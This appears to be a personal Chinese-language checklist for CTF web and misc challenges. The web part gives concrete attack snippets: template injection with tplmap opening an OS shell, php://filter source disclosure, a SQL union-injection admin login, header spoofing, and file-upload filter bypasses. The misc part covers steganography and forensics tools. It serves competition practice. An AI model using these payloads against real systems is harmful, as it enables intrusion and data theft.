|
web解题
1.hack bar看下路径 模板注入{{1+1}}?
kali
python tplmap.py -u http://792.168.1.10:8000/?name=*?
python tplmap.py -u http://792.168.1.10:8000/?name=* --engine Nunjucks --os-shell
2.源码 看cookie session,读源码/index.php?page=php://filter/read=convert.base64-encode/resource=index.php ??
3.发送到burp抓包,看头部,改下get post等 看302页面
4.目录扫描
5.sql注入,手动或sqlmap ??
联合查询 name=1' union select 0,'admin','81dc9bdb52d04dc20036dbd8313ed055'%23&pw=1234
6.X-Forwarded-For: 10.1.10.1 ?Referer:https://www.sycsecret.com/ User-Agent: Syclover
7. .git 或者.swo获取源码 备份文件泄露 robots.txt www.tar.gz index.php.bak ?source.zip
8.御剑扫描
9.漏洞利用?
10.密码修改的地方存在sql注入,或者改用户admin密码 二次注入:先注册有漏洞账号,然后登陆进去查看用户名改密码的地方。
11.文件包含 php://filter/convert.base64-encode/resource=flag.php
12.unicode欺骗 nodeprep.prepare(username)
13.文件上传 ?php3 4 5 7 phtml phps pht
14.fuzz一下 看哪些没被过滤
15.盲注
16.堆叠注入
17.上传 .htaccess content-type 改为image/jpeg
misc解题
1.图片 zip的伪加密 分离图片 爆破密码 备注可能有密码
2.编码 大小写转换
3.steghide -sf good.jpg
4.formost 流量包 图片 xls 等
5.视频隐写 pr 新建序列,拖动视频,双击效果,打开窗口 效果控制 调节亮度或者灰度
6.binwalk -e 有时候formost不好用
7.crc32错误,脚本运行生成宽高?
8.添加gif文件头
9.NTFS流隐藏文件
|